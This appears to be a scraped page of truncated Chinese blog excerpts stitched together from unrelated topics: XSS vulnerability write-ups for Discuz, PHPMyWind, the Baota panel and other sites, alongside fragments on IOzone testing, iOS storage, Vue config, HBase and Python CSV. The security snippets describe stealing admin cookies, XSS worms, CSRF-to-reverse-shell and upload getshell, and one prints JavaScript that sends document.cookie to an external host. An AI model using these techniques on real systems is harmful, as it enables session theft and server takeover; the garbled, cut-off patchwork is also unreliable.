Discuz X1.5 在添加好友的地方有处存储xss,借助此处xss跟用户交互可以进行蠕虫指数扩散. 位置在添加好友处 x完之后的效果 点击后触发 ok 借助此存储xss,我们进行worm传播,dz的会话cookie是被打伤http-only的,但是xss的效果是获取你当前域下的用户会话的权限.这不干扰我们worm的进行. step 1 : attacker 发送带xss worm payload给 用户a, step 2 : 用户A点击后,自身作为宿主去添加其他人为好友,并且附带攻击payl…
XSS平台架设攻击代码,有很多,如我是在http://xss.fbisb.com上架设的. 在 xxx.dianping.com系统意见反馈处插入xss代码提交,而后等待后台管理员点击,可打到其COOKIE,出口IP和内网IP等.危害由原本的边缘,因为已经接触到内网,所以变为中危. RANK  12 == RMB 120 该漏洞的发现应该是源于对这种与后台交互的接口的敏感,和尝试. -913…
0x0 环境 操作机:xp   192.168.110.128 目标:win2003    192.168.110.133 目标cms:PHPMyWind5.4 0x11 漏洞介绍 允许恶意访问者在客户留言处插入XSS利用语句,执行JS代码获取cookie,从而获取网站管理员权限.漏洞存在于message_update.php文件中的content参数. 漏洞影响版本:phpMyWind version <= 5.4 0x12 漏洞成因 处理客户留言内容的关键代码在message.php文件的第…
对于宝塔漏洞复现和练习 0×00  什么是宝塔面板 宝塔面板是一款使用方便,功能强大且终身免费的服务器管理软件,支持Linux 与Windows 系统.一键配置:LAMP / LNMP ,网站,数据库,FTP ,SSL,通过Web 端轻松管理服务器.推出至今备受中小站点站长喜爱,下载量过百万. 0×01  漏洞成因 在6.x Linux 版本宝塔面板当中当中,相对与5.x 版本,记录了验证码错误并存入数据库当中,存储XSS缺陷就是在此处产生. 同时利用CSRF结合宝塔的计划任务反弹shell.…
0x0 前言 通过留言处的xss,我们可以得到管理员的cookie,进而登陆后台: https://www.cnblogs.com/Rain99-/p/10701769.html 现在要从后台入手,进而getshell,提权 0x1 文件上传getshell 1. 修改上传类型 已经成功登陆了后台,管理员权限相对普通用户要高的多,所以可设置的地方也会变多.利用这些设置,可以进一步的尝试获取服务器的权限. 打开网站系统管理-网站信息配置-附件设置,我们可以看见后台可设置上传图片的类型,在上传图片类…
漏洞一.主站存在登录口爆破 抓包,爆破一下 爆破成功 漏洞二.检测app时一处存储xss 在app登录后 我要提问那里插入xss 然后弹窗 可以打到cookie 漏洞三.app个人资料处平行越权可查看大量用户(用户id可以遍历出来) 点开个人资料  然后代理抓包 可以看到  包以get的形式请求了URL http://m.91taoke.com/index.php/user/12170145 然后访问看看 此处已经可以看到email了 只需要变动id就可以切换用户了 然后在数据包里遍历下来已经注…
对于新手来说,往往会在留言地方插入<script>alert(1)</script>来检测是否有存储xss,事实是基本上不会弹框的,为啥? 通过查看源码,可知道<>标签被实体编码了. 是前端和后端设置了过滤?非也!.  因为有些标签自身具备htmlencode功能,标签有: <textarea> <title> <iframe> <noscript> <noframes> 如果绕过?那就闭合前面的标签就是了 ,…
利用IOzone进行存储性能测试   命令:1.iozone -s 10G -r 4k -i 0(0代表顺序写) -w(代表文件不删除) -+n(不测重读重写) -Rb(以某种格式生成测试文件) /tmp/iozone_4k_sq_w.xls(这里是文件的名字)    以4k大小测试顺序写10G文件的性能; 2.清除缓存:echo 3 >/proc/sys/vm/drop_caches(注意:3与>之间必须有空格) 3.iozone -s 10G -r 4k -i 1(1代表顺序读) -w -…
利用NSUserdefaults来存储自定义的NSObject类及自定义类数组 1.利用NSUserdefaults来存储自定义的NSObject类 利用NSUserdefaults也可以来存储及获取自定义非框架类对象,不过自定义的NSObject类需要实现NSCoding协议(包含2个必须实现的方法).存储过程是将自定义的NSObject转换成NSData存储. 存储:NSData *data = [NSKeyedArchiver archivedDataWithRootObject:obje…
使用的是Discuz X1.5程序,不知什么原因,今天突然出现了大问题,就是在点击“发帖”的时候,原来正常显示的网页竟然变成了XML代码!经过一番查找资料,也未能找到是什么原因导致的,只是找到了解决办法:后台清理缓存,必须所有选项都选择上!\ 如果再不行,可以删除 data\template目录下所有文件一般就能解决…
#include <stdio.h> #include<conio.h> #include<stdlib.h> /* 利用十字链表存储有向图,可用于同时查找某个顶点的出度与入度: */ typedef struct edge {//顶点表 int headvex, tailvex;//headvex弧的七点在顶点表中的下标,tailvex是边的重点在顶点表中的下标 edge *headlink, *taillink;//headlink指向与边相同起点的边,tailli…
目录 1,前言 2,.env文件的作用 3,配置.env文件 4,配置启动命令 5,获取.env中的全局变量 5,实际用处 1,前言 分享一下vue项目中利用.env文件存储全局环境变量,以及利于项目开发的vue启动以及打包命令. 2,.env文件的作用 在vue项目中,env是全局配置文件,可以存储不同环境下的变量.使用vue-cli搭建项目,默认会在根目录创建一个.env文件,如果需要更多类型的.env文件,需要自行创建. 其中: 1,.env 后缀的文件是全局默认配置文件,不论什么环境都会…
  0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www.damicms.com/downes/dami.rar 测试网站首页: 0x01 代码分析 1.漏洞文件位置:/Admin/Lib/Action/keyAction.class.php 第34-59行中: 2.  public function add() 3.     { 4.         …
漏洞版本: Discuz x 2.5 - 3.0 漏洞描述: Discuz! 已拥有11年以上的应用历史和200多万网站用户案例 是全球成熟度最高.覆盖率最大的论坛软件系统之一,淘帖处发表评论,直接插入XSS CODE.可触发XSS漏洞 <* 参考 http://loudong.360.cn/vul/info/id/255 *> 安全建议: 厂商补丁: Discuz! ------ 下载官方最新程序…
第一步配置cdn和https 1.首先去阿里云.腾讯云.七牛云等申请免费https证书 2.虚拟主机是不能直接支持https的,需要cdn处理后才可以,并且端口是80 3.开启cdn加速处理,(买一个cdn资源包,https也需要付费)关闭协议跟随回源,因为虚拟主机不支持443端口,选择ip回源,填写虚拟主机的ip地址,端口是80 4.打开cmd,用ping 加上域名来测试域名解析是否正常,然后在工具那里测试是否启用了cdn加速. 5.性能优化,开启页面优化和只能压缩. 6.直接用根域名开启cd…
目前Azure针对虚拟机提供两种类型的存储,一种是标准存储,基于HDD的,一种是高性能存储Premium Storage(在下文中简称PS),基于SSD的.针对用户高性能,低延迟,I/O密集型的应用,比如数据库MySQL, MongoDB,SAP等提供良好的支持. 本文主要介绍如何在CentOS上使用高级存储构建数据库服务器的最佳实践,包括你的应用需求在超过单盘IOPS限制的情况下,如何通过使用软RAID来构建50000级别的IOPS服务器. 目前高级存储只能用于DS/GS/FS系列机器作为数据…
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的站点出现xss漏洞,就能够运行随意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,假设这里面包括了大量敏感信息(身份信息,管理员信息)等,那完了... 例如以下js获取cookie信息: url=document.top.location.href; cookie=document.cookie; c=new Image(); c.src='http://www.******.com/c.php?c='+c…
类型转换是我们最常用的功能.就像上战场用的枪一样,敌人用的冲锋枪, 自己手里就一把步枪,打起仗来始终有点不爽. 因此,基本功能的完善很重要. 通常情况下我们需要String类型转其它的基础类型.这时我们最常用的是Convert类. 比如: Convert.ToInt32("); Convert.ToDouble("3.4"); Convert.ToDateTime("2014-4-4"); 但是这个方法一旦出现转换失败将会非常影响程序的效率. 因此这种方式…
在Web安全领域,跨站脚本攻击时最为常见的一种攻击形式,也是长久以来的一个老大难问题,而本文将向读者介绍的是一种用以缓解这种压力的技术,即HTTP-only cookie. 我们首先对HTTP-only cookie和跨站脚本攻击做了简单的解释,然后详细说明了如何利用HTTP-only cookie来保护敏感数据,最后介绍了实现HTTP-only cookie时确定浏览器版本的具体问题. 一.XSS与HTTP-only Cookie简介 跨站点脚本攻击是困扰Web服务器安全的常见问题之一.跨站点…
最近的业务处理上,要使用cookie缓存储一下数据,公司的cookie还搞出点问题.而用户的浏览器都是利用微信的内置,普遍支持h5的本地存储.于是利用了这个... 现代浏览器普遍开始支持H5本地存储,localStorage.sessionStorage.可以用来代替cookie的一部分存储功能,他比cookie存储量更大.比较实用. 两者用法类似.localStorage存储,如果不清除那么一直存在:sessionStorage是在一个会话级别上存在,如果会话关闭,那么就没了.顾名思义吧. 他…
受服务器空间制约,我们不可能在VPS上每天都备份一份新的网站数据,一是没必要,二是占空间.我们折中一下,采用星期命名,每次备份将覆盖上星期同一天的文件.从而只备份7份数据,不至于占用特别大的空间. 如果,你的vps很小家子气或是网站数据太庞大,那还可以再折中一下,仅在星期二.四.六做备份,即总共三份数据.甚至还可以选一个星期的某一天做备份,即一周备份一次,也是可以的. 在空间允许的情况下,个人推荐做7天循环备份,在vps数据全部丢失的时候,能最大程度的容灾,恢复到丢失前一天,甚至是当天凌晨备份的…
前言:此文档是用来在线下环境harbor利用MinIO做镜像存储的,至于那些说OSS不香吗?或者单机harbor的,不用看了.此文档对你没啥用,如果是采用单机的harbor连接集群MinIO,请看我的另一篇博文. 环境: 应用版本:helm v3.2.3kubernetes 1.14.3nginx-ingress 1.39.1harbor 2.0nginx 1.15.3MinIO RELEASE.2020-05-08T02-40-49Z ### 这里就不讲解kubernetes集群怎么搭建了.我…
目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 在Discuz中,uc_key是UC客户端与服务端通信的通信密钥.因此使用uc_key来fetch shell只能获取UCenter Client的webshell,即Discuiz!论坛的webshell Relevant Link: http://www.wooyun.org/bugs/wooyun-2014-048137 2. 漏洞触发条件 . 必须知道UC_KEY,通常在…
<!DOCTYPE HTML> <html> <head> <title>模拟对比投票效果</title> <meta name="description" content="HTML5Web存储" /> </head> <body> <span>能(<a href="javascript:;" id="btn"&…
我们首先来测试随机写的IOPS,可以看到随机写的IOPS可以达到,顺序写的IOPS可以达到: $ sudo fio -filename=/data/testfile -direct=1 -iodepth 1 -thread -rw=randwrite -ioengine=libaio -bs=16k -size=10G -numjobs=20 -runtime=60 -group_reporting -name=mytest $ sudo fio -filename=/data/testfile…
数学知识:标准差体现随机变量取值与其期望值的偏差.标准差的值较大,则表明该随机变量的取值与其期望值的偏差较大反之,则表明此偏差较小.函数功能:函数必须能够接受一次输入值并记录对应的已输入数N.sum(xi).sum(xi^2),用于计算当前的平均值和标准差.已输入数N.sum(xi).sum(xi^2)必须存储在持久内存中,这样在每一次调用后,不会消失,最后函数须具备需要时把这些值清零的功能. 1. State the problem编写一个程序,计算当前输入数据的平均数和标准差.函数必须具备需…
问题现象:前端接收到后台一个数据(其中包含html)标签,自动转译成html页面元素,且自动执行了脚本,造成了前端页面的阻塞 接受的后台数据为大量重复的如下代码 ");</script><button>i am but</button> 我才了解到这时xss攻击.  然而什么叫xss攻击呢?  度娘的解释是跨站脚本攻击,我现下的理解是截取后台请求,返回一段页面能执行的恶意脚本,使得web应用该界面瘫痪,可能还有更大的危害,后面了解之后在加上(6.14). 那么…
下面介绍Hbase的缓存机制: a.HBase在读取时,会以Block为单位进行cache,用来提升读的性能 b.Block可以分类为DataBlock(默认大小64K,存储KV).BloomBlock(默认大小128K,存储BloomFilter数据).IndexBlock(默认大小128K,索引数据,用来加快Rowkey所在DataBlock的定位) c.对于一次随机读,Block的访问顺序为BloomBlock.IndexBlock.DataBlock,如果Region下面的StoreFi…
下面介绍Hbase的缓存机制:  a.HBase在读取时,会以Block为单位进行cache,用来提升读的性能 b.Block可以分类为DataBlock(默认大小64K,存储KV).BloomBlock(默认大小128K,存储BloomFilter数据).IndexBlock(默认大小128K,索引数据,用来加快Rowkey所在DataBlock的定位) c.对于一次随机读,Block的访问顺序为BloomBlock.IndexBlock.DataBlock,如果Region下面的StoreF…
读取csv文件 通过csv.reader()和DictReader()两个函数 reader()函数返回一个迭代器 会包含表头 通过next函数可以跳过,但是它只能通过下标访问数据: DictReader()函数返回一个字典,不包含表头,可以通过键名访问!! import csv # with open('1 (2).csv','r') as fp: #     reader=csv.reader(fp) #     # next(reader) #     for x in reader: #…